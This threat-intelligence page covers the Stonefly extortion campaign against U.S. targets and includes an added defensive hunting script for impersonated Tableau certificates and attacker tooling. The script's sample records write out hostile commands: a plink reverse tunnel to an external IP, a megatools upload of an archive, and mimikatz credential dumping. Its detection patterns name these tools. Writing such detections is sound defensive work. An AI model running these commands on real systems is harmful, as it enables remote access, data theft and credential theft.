
Stonefly: Extortion Attacks Continue Against U.S. Targets

· Published 03/10/2024 17:08 · Modified 03/10/2024 17:23


Essential information

Tags
2024-10-03 megatools mimikatz plink snap2html
Related entities
50 observables, 10 techniques (MITRE ATT&CK), 1 other

Description

In several of the attacks, Stonefly’s custom malware Backdoor.Preft (aka Dtrack, Valefor) was deployed. This tool is exclusively associated with the group. In addition to this, several Stonefly indicators of compromise recently documented by Microsoft were found on the compromised networks. The attackers used a fake Tableau certificate documented by Microsoft in addition to two other certificates (see Indicators of Compromise) that appear to be unique to this campaign.
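The two indicator classes above, a code-signing certificate that claims to be Tableau's and the tooling this page tags (plink, megatools, mimikatz, snap2html), are the kind of thing a hunt over endpoint inventory can surface. The script below is an added example, not code from the original report or from Symantec, and every hostname, path, thumbprint and command line in it is constructed; the real indicators belong in the report's IOC list. It assumes the defender keeps an allowlist of verified vendor signing thumbprints (TRUSTED_THUMBPRINTS) and that the tagged tools are used in their usual roles, which the page does not state.

```python
"""Added example, not code from the original report or from Symantec:
a small hunt over constructed endpoint data for two indicator classes
this page mentions, code-signing certificates that claim to be
Tableau's and the tagged tooling (plink, megatools, mimikatz,
snap2html).  Every hostname, path, thumbprint and command line below
is constructed for illustration."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class SignedBinary:
    host: str
    path: str
    subject_cn: str     # CN of the leaf (signer) certificate
    issuer_cn: str      # CN of the issuing CA
    thumbprint: str     # leaf thumbprint as sigcheck-style tools print it (constructed here)
    chain_valid: bool   # did the chain build to a trusted root?


# Assumption: the defender keeps thumbprints verified to be the vendor's
# real signing certificates.  Constructed value, not a real Tableau cert.
TRUSTED_THUMBPRINTS = {"TABLEAU-GOOD-0001"}


def flag_impersonating_signers(binaries, vendor_pattern=r"tableau",
                               trusted=TRUSTED_THUMBPRINTS):
    """Return binaries whose signer claims the vendor name but is not a
    known-good certificate.  A CN alone proves nothing: a self-issued
    certificate can carry any name, and a lookalike company can obtain a
    validly chained certificate, so a valid chain is also not enough."""
    hits = []
    for b in binaries:
        if not re.search(vendor_pattern, b.subject_cn, re.I):
            continue
        if b.chain_valid and b.thumbprint.upper() in trusted:
            continue
        hits.append(b)
    return hits


# Command-line patterns for the tools this page tags.  Assumption: they
# are used in their usual roles (plink for SSH tunnels, megatools for
# uploads to MEGA, mimikatz for credential dumping, Snap2HTML for
# directory listings); the page itself only lists them as tags.
TOOL_RULES = [
    ("plink tunnel", re.compile(r"\bplink(\.exe)?\b.*\s-[RLD]\s", re.I)),
    ("megatools upload", re.compile(r"\bmega(tools(\.exe)?\s+put|put)\b", re.I)),
    ("mimikatz", re.compile(r"\bmimikatz\b|sekurlsa::|lsadump::|privilege::debug", re.I)),
    ("snap2html", re.compile(r"\bsnap2html(\.exe)?\b", re.I)),
]


def classify_cmdline(cmdline):
    """Names of every tool rule the command line matches.  Renamed
    binaries still match when their distinctive arguments are present."""
    return [name for name, rx in TOOL_RULES if rx.search(cmdline)]


# Constructed inventory: one legitimate Tableau install, one self-signed
# fake, one unrelated vendor, one validly chained lookalike.
SAMPLE_BINARIES = [
    SignedBinary("srv01", r"C:\Program Files\Tableau\Tableau Reader\TableauReader.exe",
                 "Tableau Software, Inc.", "Example Public CA", "TABLEAU-GOOD-0001", True),
    SignedBinary("srv02", r"C:\Windows\Temp\tb.exe",
                 "Tableau Software LLC", "Tableau Software LLC", "FAKE-0002", False),
    SignedBinary("srv03", r"C:\Program Files\Contoso\agent.exe",
                 "Contoso Ltd", "Example Public CA", "CONTOSO-0003", True),
    SignedBinary("srv04", r"C:\Users\Public\update.exe",
                 "Tableau Software Ltd", "Example Public CA", "LOOKALIKE-0004", True),
]

# Constructed process-creation records: (host, command line).
SAMPLE_PROCESSES = [
    ("srv01", r"C:\Windows\System32\notepad.exe C:\Users\alice\notes.txt"),
    ("srv01", r'C:\Program Files\PuTTY\plink.exe -batch backup@10.0.0.9 "uptime"'),
    ("srv02", r"C:\Windows\Temp\plink.exe -ssh -pw p@ss -R 8443:127.0.0.1:3389 user@203.0.113.5"),
    ("srv02", r"C:\Windows\Temp\megatools.exe put --username u --password p C:\Windows\Temp\docs.7z"),
    ("srv03", r"C:\Tools\Snap2HTML.exe -path:C:\ -outfile:C:\Tools\c.html -silent"),
    ("srv04", r'C:\Users\Public\mk.exe "privilege::debug" "sekurlsa::logonpasswords" exit'),
]


def hunt(binaries=SAMPLE_BINARIES, processes=SAMPLE_PROCESSES):
    """Per-host findings for both indicator classes; hosts with nothing
    suspicious are absent from the result."""
    findings = {}
    for b in flag_impersonating_signers(binaries):
        findings.setdefault(b.host, []).append(
            f"signer '{b.subject_cn}' ({b.thumbprint}) on {b.path}")
    for host, cmd in processes:
        for name in classify_cmdline(cmd):
            findings.setdefault(host, []).append(f"{name}: {cmd}")
    return findings


if __name__ == "__main__":
    for host, items in sorted(hunt().items()):
        print(host)
        for item in items:
            print("   ", item)
```

Note that srv01 stays clean: its Tableau binary carries an allowlisted thumbprint, and its plink invocation has no tunnel switch, so the rules do not fire on routine administration. The lookalike on srv04 is flagged even though its chain validates, which is the point of comparing thumbprints rather than trusting the subject name.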

External references